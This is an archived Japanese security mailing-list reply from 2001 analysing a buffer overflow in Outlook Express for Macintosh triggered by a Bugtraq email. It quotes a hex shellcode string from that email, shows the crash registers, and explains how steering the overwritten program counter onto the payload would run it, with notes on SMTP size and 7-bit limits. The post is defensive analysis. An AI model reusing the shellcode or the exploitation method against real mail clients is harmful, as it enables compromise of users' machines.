[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[stalk:01061] Re: [FYI]Buffer over flow on Outlook express for Macintosh

To: security-talk@xxxxxxxxxxxxxxxxxxxx
Subject: [stalk:01061] Re: [FYI]Buffer over flow on Outlook express for Macintosh
From: Shikap <shikap@xxxxxxxxxxxx>
Date: Tue, 4 Dec 2001 16:07:45 +0900



しかＰ＠あまりにぼやけた表現なので追記、です。

On Tue, 4 Dec 2001 15:41:03 +0900
Shikap <shikap@xxxxxxxxxxxx> wrote:

> えっと、OEを落とすには(^^;、何はともあれPCをあられもないアドレスに飛ばす、
> という作業が必要です。

なぜBugtraqのメールで落ちたか、と言うところから説明します。
メールの中には、
＞SHELLCODE=`printf "\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\xb1\x1c\x90\
＞x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x95\x04\x90\x90\x90\xac\x34\x99\xaa\
＞xe2\xfa\x71\x99\x99\x99\x99\xc4\x18\x74\x40\xb8\xd9\x99\x14\x2c\x6b\xbd\xd9\x99\
＞x14\x24\x63\xbd\xd9\x99\xf3\x9e\x09\x09\x09\x09\xc0\x71\x4b\x9b\x99\x99\x14\x2c\
＞xb3\xbc\xd9\x99\x14\x24\xaa\xbc\xd9\x99\xf3\x93\x09\x09\x09\x09\xc0\x71\x23\x9b\
＞x99\x99\xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x7c\xbc\xd9\x99\xcf\x14\x2c\
＞x70\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9\x99\xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\
＞x14\x2c\x74\xbc\xd9\x99\xcf\x14\x2c\x68\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9\x99\
＞x5e\x1c\x6c\xbc\xd9\x99\xdd\x99\x99\x99\x14\x2c\x6c\xbc\xd9\x99\xcf\x66\x0c\xae\
＞xbc\xd9\x99\x14\x2c\xb4\xbf\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\xa8\
＞xbf\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\x68\xbc\xd9\x99\x14\x24\xb4\
＞xbf\xd9\x99\x3c\x14\x2c\x7c\xbc\xd9\x99\x34\x14\x24\xa8\xbf\xd9\x99\x32\x14\x24\
＞xac\xbf\xd9\x99\x32\x5e\x1c\xbc!（実際にはこれ全部１行）

ってな行が５つもあります。

で、落ちたときのレジスタ、とくにPCは、というと、
＞PC  = 395C7838（9\x8）
になっています。PCがこの値を指すのでその番地に飛ぼうとするものの、
＞PowerPC unmapped memory exception at 395C7838
といって落ちる、つまり「たまたまマップされてない番地にとんでしまった」という
わけです。
で、くだんのメールには9\x8って文字がそこいら中にあるので、実際にどこがスタック
境界になっているか、というのを調べていないんですが（苦笑）・・・
＃だからBugtraqの投稿で言及しなかった、って話もあり(^^;;;

逆に言えば、スタック境界を特定し、PCに上書きされる値をうまく選べば、何事も
なかったように動作を続ける場合だってあり得ます。
また、PCに上書きされる値を、eggの先頭になるように作ってあげれば、eggが孵化する
と言うことにもなります。

ちなみに、今回の脆弱性を利用するための条件としては、SMTPで送れることが必須。
メールの一行は１０００文字以内、とRFCに定義されているらしいので（苦笑）、送り
こめるeggは最大で1kB弱、ただし7bit-cleanという制限がつくんで、なかなかeggを
つくるのは大変だと思います。

いじょ、補足。

-- 
　＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝
　　　鹿田　幸治　　　　　　　Koji.Shikata
　　　　E-Mail:shikap@xxxxxxxxxxxx
　snort1.7のパッチ公開中 http://www.yk.rim.or.jp/~shikap/patch/
　セキュリティスタジアム 2001    　http://sec-stadium.hawkeye.ac/
　PGP署名　         http://www.yk.rim.or.jp/~shikap/signature.gpg
　Key fingerprint = FB7E 55C4 75A1 3350 9B11  30F8 97EE A777 2726 DC8B
　＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝
--
- このメイリングリストに関する質問・問い合せ等は
- <security-talk@xxxxxxxxxx>までお知らせください
--
------------------------------------------------------------------------
　　　　　　　　　今流行りの「Badtrans」って知ってる？　　　　　　　　　
　　 　 http://www.infoseek.co.jp/Titles?qt=Badtrans&svx=971122

References:
- [stalk:01057] Re: [FYI]Buffer over flow on Outlook express for Macintosh
  - From: Shikap
- [stalk:01058] Re: [FYI]Buffer over flow on Outlook express for Macintosh
  - From: ISHIKAWA Yasuhisa
- [stalk:01059] Re: [FYI]Buffer over flow on Outlook express for Macintosh
  - From: KOJIMA Hajime / 小島肇
- [stalk:01060] Re: [FYI]Buffer over flow on Outlook express for Macintosh
  - From: Shikap

Prev by Date: [stalk:01060] Re: [FYI]Buffer over flow on Outlook express for Macintosh
Next by Date: [stalk:01062] Re: [FYI]Buffer over flow on Outlook express for Macintosh
Previous by thread: [stalk:01060] Re: [FYI]Buffer over flow on Outlook express for Macintosh
Next by thread: [stalk:01062] Re: [FYI]Buffer over flow on Outlook express for Macintosh
Index(es):
- Date
- Thread